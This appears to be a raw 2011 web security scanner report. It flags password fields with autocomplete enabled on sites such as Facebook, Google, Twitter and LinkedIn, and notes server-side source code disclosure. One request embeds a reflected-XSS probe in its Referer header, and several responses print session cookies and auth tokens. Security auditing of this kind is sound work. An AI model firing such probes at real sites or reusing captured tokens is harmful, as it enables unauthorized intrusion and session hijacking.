HTTP/1.1 200 OK Server: Apache X-Backend-Server: pm-app-bugs05 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Thu, 03 Feb 2011 22:03:58 GMT Keep-Alive: timeout=300, max=1000 Connection: close Content-Length: 12477
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Search by bug number</title>
The page contains a form with the following action URL:
https://bugzilla.mozilla.org/show_bug.cgi
The form contains the following password field with autocomplete enabled:
Bugzilla_password
Request
GET /show_bug.cgi HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Backend-Server: pm-app-bugs05 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Thu, 03 Feb 2011 22:03:58 GMT Keep-Alive: timeout=300, max=1000 Connection: close Content-Length: 12477
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Search by bug number</title>
The form contains the following password field with autocomplete enabled:
Bugzilla_password
Request
GET /show_bug.cgi?id=378962 HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Backend-Server: pm-app-bugs05 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Thu, 03 Feb 2011 22:03:58 GMT Keep-Alive: timeout=300, max=1000 Connection: close Content-Length: 59121
The form contains the following password field with autocomplete enabled:
Bugzilla_password
Request
GET /show_bug.cgi?id=378962 HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Backend-Server: pm-app-bugs05 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Thu, 03 Feb 2011 22:03:58 GMT Keep-Alive: timeout=300, max=1000 Connection: close Content-Length: 59121
The form contains the following password field with autocomplete enabled:
password
Request
GET /submit?phase=2&url=http://ir.supermedia.com/index.cfm? HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
vb_login_password
Request
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1 Host: forums.digitalpoint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /supermedia HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:19:13 GMT Server: hi Status: 200 OK X-Transaction: 1296760753-13380-14514 ETag: "980457e03ec8c8ddfb67fd40ecd97bea" Last-Modified: Thu, 03 Feb 2011 19:19:13 GMT X-Runtime: 0.01072 Content-Type: text/html; charset=utf-8 Content-Length: 50851 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296760753269662; path=/; expires=Thu, 10-Feb-11 19:19:13 GMT; domain=.twitter.com Set-Cookie: guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH%252FM9uwtAToHaWQiJTRmZjcyZDZjOTYwYzFj%250ANDkxYTkzZDhhNmVhN2Q2OGNhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--100f876db5da30de78a91b22d9b5e99bb4d21a14; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/?src=tcv3video
The form contains the following password field with autocomplete enabled:
password
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/signup.html
The form contains the following password fields with autocomplete enabled:
password
password2
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/tutorials.html
The form contains the following password field with autocomplete enabled:
password
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/signup.html
The form contains the following password fields with autocomplete enabled:
password
password2
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field with autocomplete enabled:
pwd
Request
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:49:00 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Thu, 03 Feb 2011 20:01:19 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 34911
The page contains a form with the following action URL:
http://www.facebook.com/
The form contains the following password field with autocomplete enabled:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
The form contains the following password field with autocomplete enabled:
pass
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
The form contains the following password field with autocomplete enabled:
pass
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 11422
The form contains the following password field with autocomplete enabled:
pass
Request
GET /share.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:39 GMT Content-Length: 10796
The form contains the following password field with autocomplete enabled:
pass
Request
GET /supermediacom HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:37 GMT Content-Length: 146681
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/Login HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/ServiceLogin HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The page contains a form with the following action URL:
https://www.linkedin.com/secure/login
The form contains the following password field with autocomplete enabled:
session_password
Request
GET /shareArticle HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 7453 Date: Thu, 03 Feb 2011 19:20:54 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly
The page contains a form with the following action URL:
http://membercenter.made-in-china.com/logon.do
The form contains the following password field with autocomplete enabled:
logonInfo.logPassword
Request
GET / HTTP/1.1 Host: www.made-in-china.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://www.manta.com/member/login/
The form contains the following password field with autocomplete enabled:
password
Request
GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>A B C Development ...[SNIP]... <div class="form-login"> <form action="https://www.manta.com/member/login/" method="post" id="top_login_form"> <fieldset> ...[SNIP]... <span><input id="password" name="password" title="password" type="password" class="top_login_password" /></span> ...[SNIP]...
The page contains a form with the following action URL:
https://www.manta.com/member/login/
The form contains the following password field with autocomplete enabled:
password
Request
GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The page contains a form with the following action URL:
http://www.sfweekly.com/readers/login/
The form contains the following password field with autocomplete enabled:
data[Reader][password]
Request
GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1 Host: www.sfweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.supertradeexchange.com/acct/login.asp
The form contains the following password field with autocomplete enabled:
pwd
Request
GET / HTTP/1.1 Host: www.supertradeexchange.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13237 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/ Date: Thu, 03 Feb 2011 19:35:26 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>SuperTradeExchange® - a small business community and barter netwo ...[SNIP]... </h3> <form name="SignIn" action="/acct/login.asp" method="post" onkeyup="eval_button(event, this)"> <label for="login"> ...[SNIP]... </label> <input type="password" name="pwd" id="pwd"><br> ...[SNIP]...
The page contains a form with the following action URL:
http://www.thefutoncritic.com/myfuton.aspx
The form contains the following password field with autocomplete enabled:
password
Request
GET /devwatch/wright-vs-wrong/x22 HTTP/1.1 Host: www.thefutoncritic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:29:43 GMT Connection: close Content-Length: 20828
<html> <head> <title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title> <meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright ...[SNIP]... <td>
The form contains the following password fields with autocomplete enabled:
pw
pwc
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
pw
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application appears to disclose some server-side source code written in PHP.
Request
GET /includes/js/ajaxlib.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 02:21:40 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Thu, 11 Feb 2010 01:05:35 GMT ETag: "454e8-adf-47f48bf8e75c0" Accept-Ranges: bytes Content-Length: 2783 Cache-Control: max-age=604800 Expires: Fri, 11 Feb 2011 02:21:40 GMT Content-Type: application/javascript
function callAJAX(url, respHdlr, bPageView, failHdlr, callHdlr, bAsync) {
var bAsync = (bAsync == null ? true : bAsync); var req;
try { req = new XMLHttpRequest(); /* e.g. Firefox ...[SNIP]... or request variable. For example, // assuming you used javascript to set a cookie called "php_array" // to the value of a javascript array then you can restore the cookie // from PHP like this: // <?php // session_start(); // $my_array = unserialize(urldecode(stripslashes($_COOKIE['php_array']))); // print_r ($my_array); // ?> // /* This automatically converts both keys and values to strings. // The return string is not URL escaped, so you must call the // Javascript "escape()" function before you pass this string to PHP. * ...[SNIP]...
The application appears to disclose some server-side source code written in PHP and ASP.
Request
GET /get/flashplayer/current/swflash.cab HTTP/1.1 Host: fpdownload.macromedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 25 Oct 2010 23:47:03 GMT ETag: "b72012-2a53a6-9bea6bc0" Accept-Ranges: bytes Content-Length: 2773926 Content-Type: text/plain Date: Thu, 03 Feb 2011 22:06:12 GMT Connection: close